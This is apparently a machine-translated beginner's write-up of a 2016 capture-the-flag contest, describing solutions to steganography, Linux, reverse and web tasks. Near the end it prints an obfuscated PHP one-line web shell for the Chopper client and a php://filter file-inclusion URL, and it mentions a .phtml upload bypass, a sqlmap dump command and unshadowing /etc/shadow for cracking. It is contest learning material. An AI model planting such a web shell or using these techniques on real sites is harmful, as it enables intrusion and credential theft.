2016 Seventh Quarter Geek challenge writeup

The first contact with the CTF will only do miscellaneous and a little web problem ... Because the time is more hasty, write relatively brief. Then write down what the tool uses.

Pure novice, nothing. In a state of trembling.

First, MISC

1. Registration questions

Directly fill in the title of the Syc{we1c0m3_to_g33k_2o!6}

And you can know the flag format for the rear question is syc{}

2.xiao Egg

The topic prompts attention to Weibo, from Syclover team blog (http://blog.sycsec.com) can obtain to the Clover Group Micro Bo, the private message sent flag can be obtained.

3. Flash Fast

First drag into the PS frame number view, found that the two-dimensional code is half half incomplete ... Directly found an online decomposition, a total of 18 frames, a frame sweep can be.

4.come_game

He gave up for a minute. Hand remnants of the first layer of three thorn there will not pass. After closing the game, found to generate two files, guess Deadtime is to save the number of deaths, save1 save the game level information.

After the deletion of these two files, the observation found to enter the number of deaths, time information, generate Deadtime, enter and exit the level after the generation of save1.

See how long two files were modified (left save1, right deadtime), kept at the first checkpoint at the time of the demo, so you can know that the previous guesses were correct.

With the hex editor HEXEDITXP Open save1, modify the level information, try to find a total of 5 off, can be modified.

5.Snow

Open the Web page and view the source key.

Hint is the HTML steganography, through the keyword search, you can find the snow hidden write. You can get flag by dropping the key and URL into the decoding network (http://fog.misty.com/perry/ccs/snow/snow/snow.html).

6. Spin Jump

A mp3 file, the title of "familiar sounds in the seemingly hidden what", by the topic information, you can know is MP3, using Mp3stego (http://www.petitcolas.net/steganography/mp3stego/) can be solved.

7. Minister Caesar's Award

A string similar to the flag format, combined with the title "Caesar", you can know that Caesar encryption, in the flag format, you need to move the MSW to SYC, that is, the right to move 6 bits. Can write code to run, can also be thrown into the relevant decryption site run.

8.md5cracker

Given the string 01540f319ff0cf88928c83de23l27fbb, according to the topic prompt MD5 decryption query, found invalid. Observation found that there is an L, changed to 1, again after the decryption to get flag.

9.pen_and_apple

Gave a very shameful MP4 format video, because it is misc, Lenovo to the video steganography, search, but only to find the WAV format. Prompt is the Windows command line, read the "Data hiding technology decryption" Book of Windows-related content, learned that is NTFS data stream steganography.

Use the tool to decrypt by searching. But when the first attempt was made without flag, there was a hidden content that was modified in the hands of the experiment (and then misled) ...

After the discovery can only use WinRAR to extract, otherwise the hidden file loss.

Can be extracted at the command line (using lads and streams) or viewed using the NTFS Stream info tool.

10. A traffic pack with little secrets

Downloaded after the discovery is pcapng file, according to the prompt "share with the mobile phone", search Bluetooth transmission protocol, that is, OBEX, with Wireshark analysis, positioning can be seen, the transmission of a compressed packet called "Secret.rar", extracted out can get flag.

Second, Linux

1.linux_1

Enter Docker under Ubuntu and remove the first flag under/usr/local/etc/geek/.

2.linux_2

Through the Docker directory file view, found that there is a flag2.swp, "SWP file" for the keyword search, this is the VI abnormal exit SWP file, through the vi-r {your file name} This command can be restored.

3.linux_3

Title Description flag is a user's login password, through the Docker query found that there is a user name associated with SYC.

Linux user passwords are stored in/etc/passwd and/etc/shadow

After extracting it, use tool John to write a dictionary for blasting.

Unshadow/etc/passwd/etc/shadow > MYPASSWD

Reference:http://www.cnblogs.com/iamstudy/articles/linux_password_shadow.html

http://www.heblug.org/chinese_docker/userguide/

http://blog.csdn.net/lingdxuyan/article/details/4993868

Third, program

compress300

The title is a 300-layer compression package, and the files in the compressed package are not prefixed with a file name.

Lazy directly with a key wizard, constantly decompression, modify the file suffix. Get flag.

Iv. Reverse

re10-together, hey, skin.

That's all it is. Think the reverse learning cycle is too long, listen to a teacher's advice, temporarily put down the re.

This problem can be found with OD string ...

V. Web

1.web_1

F12 look at the HTTP response header and get flag.

2.web_2

Open Web page, prompt not admin

Grab the bag and change the whoami and root.

3.Social Engineering

A social work problem.

Through the online social work library, with the mailbox query can know the name of the mailbox owner is "Sholi", the bottom of the hint said "there is the pseudo-male bar", into the Baidu "Xiao Li", you can see in a post at the time of the game release, provided a QQ number. View the QQ number content. The discovery sent a picture ... I thought it was a picture hidden, trying to be fruitless.

So check the message board content, found that the registered contact number of the domain name is flag. Then tens of thousands of online search game official Whois answer.

4.sqli1

Check the source code, there is a tips.

Can get the parameter is Sycid, use Sqlmap to the URL

(http://web.sycsec.com/d03e52c272e42e7c/?sycid=1) try to inject (in a Linux environment).

Detection injection Point--explosion---------burst field--dump.

Sqlmap-u "Http://web.sycsec.com/d03e52c272e42e7c/?sycid=1"-D sycsqli1-t "#FL4G #"--columns

Here #fl4g# need to enclose this field with a quotation mark.

Reference:http://nouername.github.io/2016/06/17/sql injection/

https://www.nigesb.com/sqlmap-common-usage-and-examples.html

http://www.legendsec.org/1111.html

5.sqli2

Use Burp to grab the bag and change the debug=1

With the logical operator XOR, using the Universal password, return 1

6. Life is short

"Cross-reference" after the calculation of the source code, get a large string of code, using online decoding, found to be Base64 and Base32, can be used to call the built-in Python module decoding.

7. Dog Master's Calculator

Write writeup the time has been unable to access this page, can only recall.

When opened, it is a piece of code that is brain-drilled. Use online decoding to get a welcome.php page.

Enter this welcome page, feel free to enter the answer, get two links, there is a link is robot.txt, Lenovo to the site robots agreement, enter this address.

View the contents of this page, and then query the information, there is an include, know that this is a file contains.

Refer to http://www.cnblogs.com/iamstudy/articles/include_file.html, query PHP related content, multiple attempts to get a string of code, decrypted to get flag.

8. Upload 1

After looking at the topic, Search for file upload vulnerability. Try uploading a sentence of PHP, the hint type is not supported. Description php suffix filter, view data, said Phpstudy can be used. php/.php3/.php4/.phtml uploaded, tested, found. phtml valid.

Use Burp to change to. phtml after uploading.

Resources:

http://www.icookie.org/file upload. html

http://wenku.baidu.com/link?url=wx-44Vq4vEpWGOOVYj9ILZlulUiYDFEbCE5_ SIAZYDEZJ3G6VVUDWNLBMNV5HXVPFYSPRWKDUBTMYXK_WYKA8VXHWIZETGVATLIBRS783J7

9. File Upload 2

After the upload is successful, it should be getshell.

Arbitrarily uploaded a word, access to the address, found that the page directly shows the PHP code, the script, ' PHP ' was replaced, resulting in a sentence can not be written. But it still won't do.

After a master tip, using <script> a word to bypass the upload, using a kitchen knife connected.

What is the specific sentence, do not know where to leave ... So I didn't give it to the organizer.

——————————————————————

Official recommended learning links for competitions:

= = web = =

File contains: http://www.cnblogs.com/iamstudy/articles/include_file.html

SQL injection: http://www.cnblogs.com/lcamry/category/846064.html

Sqli1/sqli2

Xss:https://github.com/l3m0n/xss-filter-evasion-cheat-sheet-cn

File Upload: http://wenku.baidu.com/link?url=wx-44Vq4vEpWGOOVYj9ILZlulUiYDFEbCE5_ Siazydezj3g6vvudwnlbmnv5hxvpfysprwkdubtmyxk_wyka8vxhwizetgvatlibrs783j7

Code Audit: http://wooyun.jozxing.cc/static/drops/papers-4544.html

<script language= "PHp" > $k = "the". " ERT "; $k (${"_po". " ST "} [' 8 ']);</script>
Chopper

Game.sycsec.com:50085/result.php?syc=php://filter/convert.base64-encode/resource=syc

= = Misc = =

Implicit writing: http://www.jianshu.com/p/67233f607f75
snow\ Spin Jump

Encoding and encryption: HTTP://WWW.TUICOOL.COM/ARTICLES/2E3INNM
Minister Caesar's Reward

= = Writeup = =

The fifth session of the Geek Big challenge: http://wooyun.jozxing.cc/static/drops/tips-3434.html
The sixth session of the Geek Big challenge: HTTP://WWW.TUICOOL.COM/ARTICLES/JFQMRQ2

2016 Seventh Quarter Geek challenge writeup